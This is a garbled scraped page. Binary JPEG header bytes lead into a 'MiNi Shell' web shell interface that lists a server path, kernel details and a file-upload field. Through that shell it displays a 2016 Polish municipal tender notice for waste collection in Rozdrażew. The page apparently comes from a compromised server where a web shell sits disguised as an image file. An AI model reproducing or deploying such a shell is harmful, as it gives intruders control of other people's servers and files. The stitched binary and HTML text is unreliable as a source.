JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161123/349633-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.rozdrazew.pl' target='_blank'>www.rozdrazew.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 349633 - 2016
              z dnia 2016-11-23 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rozdrażew: Odbiór, transport i zagospodarowanie  odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych na terenie gminy Rozdrażew                             <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Rozdrażew, krajowy numer identyfikacyjny
              25085518500000, ul.
              ul. Rynek 
              3,
              63708  
              Rozdrażew, woj.
              wielkopolskie, państwo
              Polska, tel.
              627 221 305, e-mail
              , faks
              627 221 370.
              <br />
              Adres strony internetowej (URL): <br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />nie dotyczy</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.rozdrazew.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Odbiór, transport i zagospodarowanie  odpadów komunalnych pochodzących od właścicieli nieruchomości zamieszkałych na terenie gminy Rozdrażew                             <br /><b>Numer referencyjny: </b>ZP.271.2.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje:
	odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport 
i zagospodarowanie odpadów zmieszanych,
	odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport 
i zagospodarowanie odpadów segregowanych zebranych w workach bądź pojemnikach 
do segregacji odpadów, 
	dostarczanie do wszystkich nieruchomości zamieszkałych worków do selektywnej zbiórki odpadów w kolorystyce zgodnej z regulaminem utrzymania czystości i porządku na terenie gm. Rozdrażew.
	odbiór, transport i zagospodarowanie odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego cztery razy w roku trakcie obowiązywania umowy,   
	odbiór, transport i zagospodarowanie odpadów komunalnych zbieranych w sposób selektywny w ramach punktu  selektywnej zbiórki odpadów komunalnych, raz na dwa miesiące,  
	odbiór, transport i zagospodarowanie z punktów zbiórki przeterminowanych leków raz na miesiąc, 
	odbiór, transport i zagospodarowanie zebranych baterii, transport i zagospodarowanie, raz na kwartał,
	odbiór, transport i zagospodarowanie na zgłoszenie Zamawiającego odpadów komunalnych (wyjątkowe przypadki)
Odbiór odpadów zmieszanych i segregowanych odbywać się będzie zgodnie z zasadami określonymi w: 
	ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach                            (Dz.U. z 2013r. poz. 1399 z póź.zm) oraz w ustawie z dnia 14 grudnia 2012r. o odpadach                                            ( Dz. U. z 2013r. poz.21 z póź.zm)
	uchwale Nr IX/56/2015 Rady Gminy Rozdrażew z dnia 30 października  2015 r.                        w sprawie szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, w zamian za uiszczoną przez właściciela nieruchomości opłatę za gospodarowanie odpadami komunalnymi   stanowiącej załącznik nr 3 do SIWZ,  
	uchwale Nr XIX/113/2016 Rady  Gminy Rozdrażew z dnia 16 września 2016r. w sprawie uchwalenia regulaminu utrzymania czystości i porządku na terenie gminy Rozdrażew  - stanowiącej załącznik nr 4 do SIWZ. 

A/ odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport                            i zagospodarowanie odpadów zmieszanych
Wykonawca będzie zobowiązany do odbioru odpadów zmieszanych z wszystkich nieruchomości zamieszkałych na terenie gminy. Zgodnie z regulaminem utrzymania czystości i porządku                         na terenie gminy Rozdrażew odpady zmieszane gromadzone będą w pojemnikach o pojemnościach  120l, 240l,  1100l. Obowiązek wyposażenia nieruchomości w pojemniki do odpadów zmieszanych leży po stronie właściciela nieruchomości. 

B/ odbiór z wszystkich nieruchomości zamieszkałych na terenie gminy, transport                                       i zagospodarowanie odpadów segregowanych
Wykonawca będzie zobowiązany do odbioru selektywnie gromadzonych odpadów z wszystkich nieruchomości zamieszkałych na terenie gminy. 
Selektywna zbiórka odpadów na nieruchomościach zamieszkałych, na których zlokalizowanych  jest nie więcej niż siedem lokali prowadzona będzie w systemie workowym  lub w pojemnikach (odpady zielone). Odpady gromadzone będą w czterech workach:
	tworzywa sztuczne, metale i opakowania wielomateriałowe  worek żółty,
	papier i tektura  worek niebieski,
	szkło bezbarwne i kolorowe   worek zielony,
	odpady zielone (części roślin pochodzących z pielęgnacji terenów zielonych)  worek brązowy lub pojemniki o pojemności od 80-1100 litrów  

W przypadku nieruchomości, na których zlokalizowanych jest więcej niż siedem lokali odpady zbierane selektywnie gromadzone będą w pojemnikach o pojemności 1100 litrów lub w workach:
	szkło bezbarwne i kolorowe   pojemnik 1100l lub w workach kolor zielony,
	tworzywa sztuczne, metale, opakowania wielomateriałowe     pojemnik 1100 l i workach, kolor żółty,
	papier i tektura   pojemnik 1100 l lub worki -  kolor niebieski,
	odpady zielone  worek brązowy lub pojemniki o pojemności od 80 do 1100 litrów.

C/ dostarczanie do wszystkich nieruchomości zamieszkałych worków do selektywnej zbiórki odpadów
Wykonawca będzie zobowiązany do dostarczenia worków do selektywnej zbiórki odpadów                     o następujących parametrach:
1)	worek żółty, o  pojemności 80 l lub 120 l wykonany z folii polietylenowych LDPE lub HDPE, umożliwiający identyfikację zawartych w nich odpadów  do zbierania tworzyw sztucznych, metali i opakowań wielomateriałowych,
2)	worek niebieski, o  pojemności 80l lub 120 l, wykonany z folii LDPE lub HDPE, umożliwiający identyfikację zawartych w nich odpadów  do zbierania papieru i tektury,
3)	worek zielony, o  pojemności 80 l lub 120 l, wykonany z folii polietylenowych LDPE lub HDPE, umożliwiający identyfikację zawartych w nich odpadów  do zbierania szkła bezbarwnego i kolorowego,
4)	worek brązowy, o minimalnej pojemności 120 l, wykonany z folii polietylenowych LDPE lub HDPE, umożliwiający identyfikację zawartych w nich odpadów  do zbierania odpadów zielonych (części roślin pochodzących z pielęgnacji terenów zielonych) lub pojemnik.

W przypadku odbioru odpadów zielonych z pojemników, Wykonawca zobowiązany jest do wyposażenia mieszkańców w pojemniki  na własny koszt.
Wykonawca zobowiązany jest dostarczyć worki do selektywnej zbiórki odpadów w następujący sposób:
1)	w terminie odbioru odpadów segregowanych w miesiącu styczniu dostarczy do każdej posesji, której właściciel zadeklarował segregowanie odpadów po 1 worku w kolorach: żółtym, niebieskim, zielonym. Szacunkowa ilość  po 1.100 szt. w każdym kolorze.
2)	w terminie do 15 stycznia 2017r. do siedziby Zamawiającego w celu udostępnienia właścicielom nieruchomości w przypadku zwiększonego zapotrzebowania w okresie pomiędzy terminami zbiórki odpadów. Wymagana ilość: 
	po 200 szt. worków na szkło  i tworzywa sztuczne, papier i tekturę.
	do 30 marca 2017r., 100 szt. worków na odpady zielone.
3)	Począwszy od zbiórki odpadów segregowanych w miesiącu styczniu 2017r. Wykonawca zobowiązany będzie przekazywać właścicielom posesji worki do zbiórki selektywnej: szkła             ( kolor zielony), tworzyw sztucznych ( kolor żółty), makulatury ( kolor niebieski)o wybranej przez właściciela posesji pojemności worka ( 80 l lub 120 l). 
4)	w terminach odbioru odpadów zbieranych selektywnie do wszystkich nieruchomości, których właściciele zadeklarowali zbiórkę odpadów w sposób selektywny. Przy każdorazowym odbiorze odpadów selektywnie zebranych, Wykonawca winien dostarczyć nowe worki w ilości i rodzaju odpowiadające liczbie odebranych worków.

Wykonawca jest zobowiązany w ramach niniejszego zamówienia do zapewnienia właścicielom nieruchomości zamieszkałych na których zlokalizowanych jest więcej niż siedem lokali worków do zbierania odpadów zielonych oraz papieru i tektury. 

D/ odbiór odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego 
i elektronicznego 
W okresie obowiązywania umowy Wykonawca zobowiązany będzie do przeprowadzenia raz                    w roku zbiórki z terenu wszystkich nieruchomości zamieszkałych odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego, wystawionego przed posesję (w formie tzw. wystawki). Wykonawca zobowiązany jest wpisać termin przeprowadzenia zbiórki objazdowej                    do harmonogramu odbioru odpadów stanowiącego załącznik do umowy.

E/ odbiór, transport i zagospodarowanie odpadów komunalnych zbieranych w sposób selektywny w ramach Punktu Selektywnej Zbiórki Odpadów Komunalnych
W ramach zamówienia Wykonawca zobowiązany będzie  do odbioru odpadów z PSZOKu. Odbiór odpadów przez Wykonawcę  nastąpi  raz na 2  miesiące, w szczególnych przypadkach w terminie  48 godz. od zgłoszenia przez Zamawiającego.
Rodzaje odpadów objętych zbiórką:
	zużyty sprzęt elektryczny i elektroniczny;
	odpady wielkogabarytowe;
	przeterminowane leki i chemikalia, w ilości nieograniczonej;
	przenośne baterie i akumulatory;
	zużyte opony, w ilości do 4 szt. od jednego pełnoletniego mieszkańca;
	odpady budowlane i rozbiórkowe, w ilości do 150 kg z jednej nieruchomości;
	papier i tektury;
	tworzywa sztuczne, opakowania wielomateriałowe, metale;
	szkło (bezbarwne i kolorowe);
	odpady zielone;
	pozostałe odpady problemowe (np. świetlówki, żarówki, szyby, porcelana).
Rodzaje kontenerów i pojemników na PSZOK:
- kontenery  24 m3 ( drewno, stolarka, tworzywa sztuczne, wielkogabaryty, opony ,odpady   
  zielone,
- kontenery 7m3 ( gruz, styropian, gips, karton gips, inne odpady budowlane                                     i rozbiórkowe, szkło, zużyty sprzęt elektryczny
- pojemniki 1100 l ( papier, tektura , metale, odpady wielomateriałowe)
           
F/  odbiór z punktów zbiórki przeterminowanych leków , baterii i przenośnych akumulatorów  
Wykonawca będzie zobowiązany do odbioru przeterminowanych leków z aptek oraz odbioru baterii i przenośnych akumulatorów z placówek oświatowych i siedziby Urzędu Gminy.
Na dzień 1 stycznia 2017r. zbiórką objęte będą następujące punkty:
apteki przy ul. Krotoszyńskiej 9 i ul. Koźmińskiej 10 w Rozdrażewie,
	 Zespoły Szkół Publicznych w Nowej Wsi i Rozdrażewie (ul. Krotoszyńska 42),
	Urząd Gminy Rozdrażew  budynek przy ul. Rynek 1.
Pojemniki do zbiórki stanowią własność Zamawiającego. Zamawiający nie przewiduje zmiany wysokości wynagrodzenia w przypadku zgłoszenia się do udziału w zbiórce kolejnych aptek. 

<br /><br /><b>II.5) Główny kod CPV: </b>90513100-7<br /><b> Dodatkowe kody CPV:</b>90511000-2,
                90512000-9,
                90512000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenie w okresie obowiązywania umowy zamówienia uzupełniającego    w wysokości nie większej niż 50% wartości przedmiotowego zamówienia 
na podstawie art. 67 ust. 1 pkt. 6 ustawy PZP.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
	
1)	spełniają warunki, o których mowa w art. 22 ust.1b ustawy PZP:
a)	dotyczące kompetencji lub uprawnień do wykonywania określonej działalności zawodowej,               o ile wynika to z odrębnych przepisów, tj. posiadają: 
	aktualne zezwolenie na prowadzenie działalności w zakresie zbierania i transportu odpadów, wydane przez właściwy organ, na podstawie ustawy  z 14 grudnia 2012 r.                   o odpadach (t.j. Dz. U. z 2013 r. poz. 21, ze zm.) oraz rozporządzeń wydanych do tejże ustawy, obejmującego co najmniej odpady o kodach wymienionych w poniższej tabeli:
Kategoria odpadu	Kod odpadu
Zmieszane odpady komunalne	20 03 01
Szkło oraz opakowania ze szkła	15 01 07, 15 01 06, 20 01 02
Papier, tektura (makulatura)	15 01 01, 15 01 06, 20 01 01
Metale oraz opakowania z metali	15 01 04, 15 01 06, 20 01 40
Tworzywa sztuczne i opakowania z tworzyw sztucznych	15 01 02, 15 01 06, 20 01 39
Opakowania wielomateriałowe	15 01 05, 15 01 06
Odpady biodegradowalne (zielone)	20 02 01
Przeterminowane leki i chemikalia	20 01 31*, 20 01 32, 20 01 13*, 20 01 14*, 20 01 15*, 20 01 27*, 20 01 28, 20 01 30, 20 01 19*, 20 01 80
Zużyte baterie i akumulatory	20 01 33*, 20 01 34
Zużyty sprzęt elektryczny i elektroniczny	20 01 21*,20 01 23*, 20 01 35*, 20 01 36
Meble i inne odpady wielkogabarytowe	20 03 07
Odpady budowlane i rozbiórkowe 	17 01 01, 17 01 02, 17 01 03, 17 01 07
 Zużyte opony	16 01 03
aktualne zaświadczenie o uzyskaniu wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Gminy Rozdrażew, dokonanego na podstawie ustawy z 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2016 r. poz. 250) 
	aktualny wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny                                  i elektroniczny, prowadzony przez Głównego inspektora Ochrony Środowiska oraz Marszałka Województwa, zgodnie z art. 234 ustawy z 14 grudnia 2012 r. o odpadach (t.j. Dz. U. z 2013 r. poz. 21, ze zm.) 

<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                b)	dotyczące sytuacji ekonomicznej lub finansowej, tj.:
są ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej                      z przedmiotem zamówienia na kwotę co najmniej 200 000 zł (słownie: dwieście tysięcy złotych), 
	posiadają środki finansowe lub zdolność kredytową w wysokości nie niższej                          niż 200 000,00 zł,
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                c)	dotyczące zdolności technicznej lub zawodowej, tj.: 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, należycie wykonali co najmniej jedną usługę, odpowiadającą przedmiotowi niniejszego zamówienia, polegającą                        w szczególności na odbieraniu odpadów komunalnych zmieszanych oraz zbieranych selektywnie od mieszkańców z terenu gminy o liczbie posesji powyżej 1000 jednorodzinnych oraz co najmniej jednej wielorodzinnej (blok mieszkalny), o łącznej wartości nie mniejszej niż 350 000 zł (słownie: trzysta pięćdziesiąt tysięcy złotych),
oraz
	dysponują lub będą dysponować: samochodami specjalistycznymi i samochodem ciężarowym, spełniającymi wymagania techniczne określone przepisami ustawy prawo               o ruchu drogowym oraz innymi przepisami szczegółowymi, w ilości (łącznej):
co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych  z pojemników 120 l, 240 l,
co najmniej jeden pojazd przystosowany do odbierania zmieszanych odpadów komunalnych  z pojemników 1100 l,
co   najmniej   dwa pojazdy  przystosowany  do   odbierania odpadów  selektywnie zebranych w workach,
co najmniej  jeden samochód  ciężarowy przystosowany  do odbioru  odpadów wielkogabarytowych,
	co najmniej jeden pojazd przystosowany do odbioru odpadów od posesji trudno dostępnych,
posiadają lub będą posiadać odpowiednią do przedmiotu zamówienia, bazę transportowa z zapleczem techniczno-biurowym, spełniającą wymagania przepisów budowlanych, sanitarnych i ochrony środowiska; baza transportowa ma zapewnić możliwość garażowania taboru samochodowego na jej terenie, a zaplecze  techniczno-biurowe  ma umożliwić codzienny kontakt Wykonawcy z przedstawicielem Zamawiającego,
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">8.	W terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert (art. 86 ust. 5 ustawy PZP): Wykonawca składa oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP; w przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa każdy                                 z Wykonawców.
